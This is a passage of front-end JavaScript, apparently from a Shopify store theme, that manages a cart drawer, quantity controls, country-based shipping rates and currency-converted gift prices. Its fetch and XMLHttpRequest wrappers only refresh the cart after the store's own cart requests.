        if (data_input.value > 1) {
          data_input.value = parseInt(data_input.value) - 1;
          updateQtyOperation();
        }
      });
    });

  document.querySelectorAll(".plus_operation").forEach(function (plus_button) {
    plus_button.addEventListener("click", function (e) {
      var data_input = document.getElementById(
        e.target.getAttribute("data-input")
      );
      data_input.value = parseInt(data_input.value) + 1;
      updateQtyOperation();
    });
  });

  document
    .querySelectorAll(".remove_operation")
    .forEach(function (plus_button) {
      plus_button.addEventListener("click", function (e) {
        var data_input = document.getElementById(
          e.target.getAttribute("data-input")
        );
        data_input.value = 0;
        updateQtyOperation();
      });
    });

  document.querySelectorAll(".cart__qty-input").forEach(function (qty_input) {
    qty_input.addEventListener("keyup", function (e) {
      updateQtyOperation();
    });
  });

  document
    .querySelectorAll(".close_mini_cart")
    .forEach(function (close_mini_cart) {
      close_mini_cart.addEventListener("click", function (e) {
        var minicart_drawer = document.querySelector(".minicart_drawer");
        minicart_drawer.classList.remove("open");
        document.querySelector("body").classList.remove("open_minicart_drawer");
      });
    });
  updateAjaxCountryHolder();
}
var lisner_url = [
  window.routes.cart_change_url + ".js",
  window.routes.cart_change_url,
  window.routes.cart_update_url + ".js",
  window.routes.cart_update_url,
  window.routes.cart_add_url + ".js",
  window.routes.cart_add_url,
];
let o = XMLHttpRequest.prototype.open;
if (
  ((XMLHttpRequest.prototype.open = function () {
    const [t, e] = arguments;
    "POST" === t &&
      lisner_url.includes(e) &&
      this.addEventListener("load", () => {
        renderCustomCart();
      }),
      o.apply(this, arguments);
  }),
  "function" == typeof window.fetch)
) {
  const t = window.fetch;
  window.fetch = function (...e) {
    const [o, r] = e,
      i = t.apply(window, e);
    return (
      "POST" === (null == r ? void 0 : r.method) &&
        lisner_url.includes(o.toString()) &&
        i.then((t) => {
          200 === t.status && renderCustomCart();
        }),
      i
    );
  };
}

if(window.location.href.indexOf('/products') !== -1 && !$('.product-form__submit').hasClass('waitlist-enabled')){
    document.addEventListener("click", function (e) {
      setTimeout(function () {
        var gethtml =
          '<div class="needtocart"> <span class="price_info">' +
          window.publicAddToCartButText +
          " </span><span class='money-pr'>" +
          window.prodPageAddToCartPrice +
          '</span></div> <div class="flexbox"> <div> <div class="dot-loader"></div> <div class="dot-loader dot-loader--2"></div> <div class="dot-loader dot-loader--3"></div> </div> </div> <div class="addedtocrt">Formula added to cart</div>';
        $(
          "button.product-form__submit.button.button--full-width.button--primary"
        ).html(gethtml);
      }, 1000);
    });
}

$(".button_popup").on("click", function () {
  window.location.href =
    "https://slurplaboratories.ca" + window.location.pathname;
});

if ($("[data-variant-radio]").length > 1) {
  var selectedVariant = $("[data-variant-radio]:checked").val();

  var filter = $("[data-variant-radio]:checked").val();
  var slidesxcol;

  if (
    filter == "all" ||
    filter == "" ||
    filter == null ||
    filter == undefined
  ) {
    $("[data-filter]")
      .removeClass("non-swiper-slide")
      .addClass("swiper-slide")
      .show();
    slidesxcol = 1;
    swiper.destroy();
    swiper = new Swiper(".swiper-container", {
      pagination: ".swiper-pagination",
      slidesPerView: 1,
      slidesPerColumn: slidesxcol,
      paginationClickable: true,
      loop: true,
      spaceBetween: 30,
      navigation: {
        nextEl: ".swiper-button-next",
        prevEl: ".swiper-button-prev",
      },
    });
  } else {
    $(".swiper-slide")
      .not("[data-filter='" + filter + "']")
      .addClass("non-swiper-slide")
      .removeClass("swiper-slide")
      .hide();
    $("[data-filter='" + filter + "']")
      .removeClass("non-swiper-slide")
      .addClass("swiper-slide")
      .attr("style", null)
      .show();

    slidesxcol = 1;
    swiper.destroy();
    swiper = new Swiper(".swiper-container", {
      pagination: ".swiper-pagination",
      slidesPerView: 1,
      slidesPerColumn: slidesxcol,
      paginationClickable: true,
      loop: true,
      spaceBetween: 30,
      navigation: {
        nextEl: ".swiper-button-next",
        prevEl: ".swiper-button-prev",
      },
    });
  }
}

async function shippingRateUpdate(onlineUpdate = false) {
  if (onlineUpdate) {
    await $.ajax({
      type: "GET",
      contentType: 'application/json',
      dataType: 'json',
      url: "https://" + window.top.location.host + "/services/currency/update?return_to=%2Fcart.json&currency=" + shippingCurrencyCode,
      success: function (data) {
        try {
          window.shippingSubTotal = data.total_price;
          window.finalSubtotal = data.total_price;
          window.shippingTotalWeight = data.total_weight;
          window.shippingTotalItems = data.item_count;
        } catch (error) {
          data = JSON.parse(data);
          window.shippingSubTotal = data.total_price;
          window.finalSubtotal = data.total_price;
          window.shippingTotalWeight = data.total_weight;
          window.shippingTotalItems = data.item_count;
        }
      },
      error: function (jqXHR, text, errorThrown) {
          // console.log(jqXHR + " " + text + " " + errorThrown);
      }
    });
  }
  setTimeout(function () {
    var canBeShipped = 0;
    if (window.shippingTotalItems > 0) {
      Shopify.money_format = window.moneyFormat;
      var cartShippingSelector = document.getElementById("totalCartShipping");
      var cartSubtotalSelector = document.getElementById("finalCartSubtotal");
      if (cartShippingSelector != null && cartSubtotalSelector != null) {
        var userCountry = getShopCookie("slurpUserCountry");
        var userCurrency = getShopCookie("cart_currency");
        window.shippingSubTotal =
          window.shippingSubTotal / Number(Shopify.currency.rate);
        window.shippingSubTotal = window.shippingSubTotal * 0.01;
        var countryShipping = 0, countryShippingReal = 0;
        for (var i = 0; i < slurpShippingRates.shippingRates.length; i++) {
          var currentCntryList =
            slurpShippingRates.shippingRates[i].countries.toLowerCase();
          if (currentCntryList.includes(userCountry.toLowerCase())) {
            var basedOn = slurpShippingRates.shippingRates[i].basedOn;
            var shippingRates = slurpShippingRates.shippingRates[i].rates;
            if (basedOn == "price") {
              // GET FREE SHIPPING MIN PRICE START
              for (var fr = 0; fr < shippingRates.length; fr++) {
                var minFreeShipPrice =
                  slurpShippingRates.shippingRates[i].rates[fr].min == null
                    ? 0
                    : slurpShippingRates.shippingRates[i].rates[fr].min;
                var currentShippingRateForProgress =
                  slurpShippingRates.shippingRates[i].rates[fr].rate;
                // console.log(currentShippingRateForProgress);
                if (currentShippingRateForProgress == "0.00") {
                  document.getElementsByClassName(
                    "awayfromsp"
                  )[0].style.display = "block";
                  minFreeShipPrice =
                    (Number(Shopify.currency.rate) * minFreeShipPrice).toFixed(
                      2
                    ) * 1;
                  // console.log(window.finalSubtotal+'-'+minFreeShipPrice+'-'+userCountry);
                  calculateProgress(
                    window.finalSubtotal,
                    minFreeShipPrice * 100,
                    userCountry
                  );
                  break;
                }
              }
              // GET FREE SHIPPING MIN PRICE END
              for (var j = 0; j < shippingRates.length; j++) {
                var minPrice =
                    slurpShippingRates.shippingRates[i].rates[j].min == null
                      ? 0
                      : slurpShippingRates.shippingRates[i].rates[j].min,
                  maxPrice =
                    slurpShippingRates.shippingRates[i].rates[j].max == null
                      ? 100000000000
                      : slurpShippingRates.shippingRates[i].rates[j].max;
                if (
                  window.shippingSubTotal >= minPrice &&
                  window.shippingSubTotal <= maxPrice
                ) {
                  countryShipping =
                    slurpShippingRates.shippingRates[i].rates[j].rate;
                  canBeShipped = 1;
                  break;
                }
              }
              countryShipping = Number(Shopify.currency.rate) * countryShipping;
              countryShipping = countryShipping * 100;
              countryShippingReal = countryShipping * 0.01;
              if(typeof(window.slurpShippingRatesRounding[window.shippingCurrencyCode])!="undefined")
                countryShippingReal = roundToNearest(window.slurpShippingRatesRounding[window.shippingCurrencyCode],countryShippingReal);
              cartShippingSelector.innerHTML =
                Shopify.formatMoney(countryShippingReal*100);
              cartSubtotalSelector.innerHTML = Shopify.formatMoney(
                (window.finalSubtotal * 0.01 + countryShippingReal) * 100
              );
            } else if (basedOn == "weight") {
              // console.log('wer');
              for (var j = 0; j < shippingRates.length; j++) {
                var minWeight =
                    slurpShippingRates.shippingRates[i].rates[j].min == null
                      ? 0
                      : slurpShippingRates.shippingRates[i].rates[j].min,
                  maxWeight =
                    slurpShippingRates.shippingRates[i].rates[j].max == null
                      ? 100000000000
                      : slurpShippingRates.shippingRates[i].rates[j].max;
                if (
                  window.shippingTotalWeight >= minWeight &&
                  window.shippingTotalWeight <= maxWeight
                ) {
                  countryShipping =
                    slurpShippingRates.shippingRates[i].rates[j].rate;
                  canBeShipped = 1;
                  break;
                }
              }
              countryShipping = Number(Shopify.currency.rate) * countryShipping;
              countryShipping = countryShipping * 100;
              countryShippingReal = countryShipping * 0.01;
              if(typeof(window.slurpShippingRatesRounding[window.shippingCurrencyCode])!="undefined")
                countryShippingReal = roundToNearest(window.slurpShippingRatesRounding[window.shippingCurrencyCode],countryShippingReal);
              cartShippingSelector.innerHTML =
                Shopify.formatMoney(countryShippingReal*100);
              cartSubtotalSelector.innerHTML = Shopify.formatMoney(
                (window.finalSubtotal * 0.01 + countryShippingReal) * 100
              );
            } else {
            }
            break;
          }
        }
      }
      if (canBeShipped == 0)
        cartShippingSelector.innerHTML = Shopify.formatMoney(0000);
    }
  }, 2500);
}

function checkItem() {
  updateCartCount();
  $.ajax({
    type: "GET",
    url: "https://" + window.top.location.host + "/services/currency/update?return_to=%2Fcart&currency=" + shippingCurrencyCode,
    success: function (data) {
      var qty = $(data).find(".cat--all-item").html();
      var paymnt = $(data).find(".cart__footer").html();
      setTimeout(function () {
        var gtsks = $(data)
          .find(".cart-count-bubble")
          .find("total--items-mon")
          .text();
      }, 1000);
      $(".cart--drawer .receive--item").html(
        '<div class="Close--cart"><svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" viewBox="0 0 36.447 38.048"> <path id="Path_4732" data-name="Path 4732" d="M0,0,30.342,32.85" transform="matrix(0.996, -0.087, 0.087, 0.996, 1.678, 3.984)" fill="none" stroke="#000" stroke-linecap="round" stroke-width="1.75"></path> <path id="Path_4733" data-name="Path 4733" d="M0,0,30.341,32.85" transform="matrix(0.035, 0.999, -0.999, 0.035, 34.109, 3.291)" fill="none" stroke="#000" stroke-linecap="round" stroke-width="1.75"></path> </svg></div>' +
          qty +
          paymnt +
          " "
      );
      $(".cart--drawer .cartnote")
        .empty()
        .append($(".desktop-cartnote"))
        .append($(".mobile-cartnote"));
      $(".cart--drawer .cart__blocks, .cart--drawer .cartnote").addClass(
        "page-width"
      );
      $(".cart--drawer .btn--dynmhome").addClass("page-width");
      $(".cart__checkout-button").prop("disabled",false);
      shippingRateUpdate(true);
    },
  });
}

checkItem();

$(".cart--drawer").on("click", ".quantity__button", function () {
  var qty = $(this).attr("qty");
  $.ajax({
    type: "POST",
    url: qty,
    success: function (data) {
      checkItem();
    },
  });
});
$(".cart--drawer").on("click", "cart-remove-button .button", function (e) {
  var qty = $(this).attr("href");
  $.ajax({
    type: "POST",
    url: qty,
    success: function (data) {
      checkItem();
    },
  });
  e.preventDefault();
});

$("body").on("click", ".Close--cart", function () {
  $("body").removeClass("cart--show");
});
$("a#cart-icon-bubble").click(function (e) {
  e.preventDefault();
  setTimeout(function () {
    $("body").addClass("overlay");
  }, 100);
  checkItem();
  $("body").addClass("cart--show");
});
setInterval(function () {
  $(".receive--item table.cart-items quantity-input.quantity input").addClass(
    "noevnt"
  );
}, 100);
$(".added--bar span").on("click", function () {
  $("a#cart-icon-bubble").trigger("click");
});
$(".product-form__submit").on("click", function () {
  var pid = $(this).closest("[pid]").attr("pid");
  // if(dispatchDateData[inventoryAtcProdId]['' + window.dispatchDataVarId][window.buttonSelectorLocation]!="" && window.isPreorderTermAccepted==0 && pid!="1903438135353"){
  //   $('#preorder-button').click();
  // }
  if(1){
    $.ajax({
      type: "GET",
      url: window.routes.cart_url,
      success: function (data) {
        var qty = $(data)
          .find('.cart__items [pid="' + pid + '"] input#abc')
          .val();
  
        if (qty >= 2) {
          alert("Maximum allowed quantity exceeded.");
        } else {
          $('.product-form__buttons[pid="' + pid + '"]').find('.product-form__submit').addClass('adding loader');
          var addCartUrl = window.routes.cart_add_url + ".js";
          let form_srialized = '';
          if(window.location.href.indexOf('/products') !== -1){
            form_srialized = $("[data-type=add-to-cart-form]").serialize();
          }else{
            form_srialized = $("[data-form-id='"+pid+"']").find("[data-type=add-to-cart-form]").serialize();
          }
            
          $.ajax({
            type: "POST",
            url: addCartUrl,
            dataType: "json",
            data: form_srialized,
            success: function (data) {
              setTimeout(function () {
                $(".added--bar").removeClass("display_Fast");
                $("button.product-form__submit.button.adding").removeClass(
                  "adding adddtext loader"
                );
              }, 5000);
              setTimeout(function () {
                checkItem();
                $("button.product-form__submit.button.adding").addClass(
                  "adddtext"
                );
                $(".added--bar").addClass("display_Fast");
              }, 000);
              updateCartCount();
            },
            error: function (data) {
              console.log(data)
              // ... do something with the data...
            },
          });
        }
      },
    });
  }
});

$(document).click(function (e) {
  var container = $("body.cart--show.overlay .cart--drawer");
  if (!container.is(e.target) && container.has(e.target).length === 0) {
    $("body.overlay").removeClass(" cart--show overlay ");
  }
});

if ($(".hero-banner.video-item").length) {
  var getwindo = $(window).height() + 20;
  $(".hero-banner.video-item").css("height", getwindo + "px");
  $(".hero-banner.video-item video")[0].play();
  $(window).on("resize", function () {
    var getwindo = $(window).height();
    $(".hero-banner.video-item").css("height", getwindo + "px");
  });
  $("body").on("touchmove", function (e) {
    if (!$(".scrollable").has($(e.target)).length) e.preventDefault();
  });
}

if ($(".custom-reviews").length > 0) {
  if (
    window.location.search.indexOf("utm_campaign=decalt_22") != -1 ||
    window.location.search.indexOf("utm_campaign=22decalt") != -1 ||
    window.location.search.indexOf("decalt-gb") != -1 ||
    window.location.search.indexOf("utm_campaign=lpv-global") != -1
  ) {
    $(".custom-reviews").show();
  }
}

$(document).ready(function (){  
  // setTimeout(function() {
    if(location.href.indexOf('/products/holiday23') != -1){
        let compare = $(document).find('[data-compare]'),
        c_price = compare.attr('data-compare');
        c_price = c_price * Shopify.currency.rate;
        c_price = Math.round(c_price);
        c_price = c_price.toString();
        c_price = c_price.slice(0, -2) + '.' + c_price.slice(-2);
        c_price = parseFloat(c_price);
        let final_c_price = roundToNearest(1, c_price);
        final_c_price = final_c_price.toString();
        final_c_price = final_c_price + '00';
        final_c_price = parseInt(final_c_price);
        compare.text(Shopify.formatMoney(final_c_price));
    }

  setTimeout(function() {
    if($('body').hasClass('template-product-slurp-gift')){
        let price_gift = 7500;
        price_gift = price_gift * Shopify.currency.rate;
        price_gift = Math.round(price_gift);
        price_gift = price_gift.toString();
        price_gift = price_gift.slice(0, -2) + '.' + price_gift.slice(-2);
        price_gift = parseFloat(price_gift);
        let final_price_gift = roundToNearest(1, price_gift);
        final_price_gift = final_price_gift.toString();
        final_price_gift = final_price_gift + '00';
        final_price_gift = parseInt(final_price_gift);
        final_price_gift = Shopify.formatMoney(final_price_gift);
        // $(document).find('.product-form__submit .needtocart').html('<span class="price_info">'+window.publicAddToCartButText+'</span>'+final_price_gift+' +');
        $(document).find('#desc-condition-price').text(final_price_gift);

        let price_gift_1 = 1000;
        price_gift_1 = price_gift_1 * Shopify.currency.rate;
        price_gift_1 = Math.round(price_gift_1);
        price_gift_1 = price_gift_1.toString();
        price_gift_1 = price_gift_1.slice(0, -2) + '.' + price_gift_1.slice(-2);
        price_gift_1 = parseFloat(price_gift_1);
        let final_price_gift_1 = roundToNearest(1, price_gift_1);
        final_price_gift_1 = final_price_gift_1.toString();
        final_price_gift_1 = final_price_gift_1 + '00';
        final_price_gift_1 = parseInt(final_price_gift_1);
        final_price_gift_1 = Shopify.formatMoney(final_price_gift_1);
        $(document).find('.desc-gift-price').text(final_price_gift_1);
    }
  }, 1800)
    
  if(location.href.indexOf('/collections/all') != -1){
        let price_gift_above = 7500;
        price_gift_above = price_gift_above * Shopify.currency.rate;
        price_gift_above = Math.round(price_gift_above);
        price_gift_above = price_gift_above.toString();
        price_gift_above = price_gift_above.slice(0, -2) + '.' + price_gift_above.slice(-2);
        price_gift_above = parseFloat(price_gift_above);
        let final_price_gift_above = roundToNearest(1, price_gift_above);
        final_price_gift_above = final_price_gift_above.toString();
        final_price_gift_above = final_price_gift_above + '00';
        final_price_gift_above = parseInt(final_price_gift_above);
        final_price_gift_above = Shopify.formatMoney(final_price_gift_above);
        $(document).find('#gift-price-above').text(final_price_gift_above);

        let price_gift = 1000;
        price_gift = price_gift * Shopify.currency.rate;
        price_gift = Math.round(price_gift);
        price_gift = price_gift.toString();
        price_gift = price_gift.slice(0, -2) + '.' + price_gift.slice(-2);
        price_gift = parseFloat(price_gift);
        let final_price_gift = roundToNearest(1, price_gift);
        final_price_gift = final_price_gift.toString();
        final_price_gift = final_price_gift + '00';
        final_price_gift = parseInt(final_price_gift);
        final_price_gift = Shopify.formatMoney(final_price_gift);
        $(document).find('#gift-price').text(final_price_gift);
        // $(document).find('.gift-price-sub').text(final_price_gift);
        $(document).find('.card-wrapper.holiday-gift-card span.price-item--regular').text(final_price_gift);     

        price_gift_korea = price_gift * Currency.rates.KRW;   
        // console.log(price_gift_korea);
  }

  $(function(){
    var overlay = $('<div id="overlay"></div>'), canadaModalTotalSessCnt = getShopCookie("canadaModalTotalSessCnt");
    overlay.show();
    overlay.appendTo(document.body);
    // $('.popup-onload').show();
    $('.close').click(function(){
      window.canadaModalReload = 0;
      $('.popup-onload').hide();
      overlay.appendTo(document.body).remove();
      if(canadaModalTotalSessCnt=="")
        document.cookie = "canadaModalTotalSessCnt=1;";
      else if(canadaModalTotalSessCnt=='1')
        document.cookie = "canadaModalTotalSessCnt=2;";
      return false;
    });
    $('.x').click(function(){
      $('.popup').hide();
      overlay.appendTo(document.body).remove();
      return false;
    });
  });
})

// if(window.innerWidth < 768){
//   $('.hero-banner.mobile-banner').css('height', window.innerHeight)
//   $('body.template-index').css('height', 'auto')
// }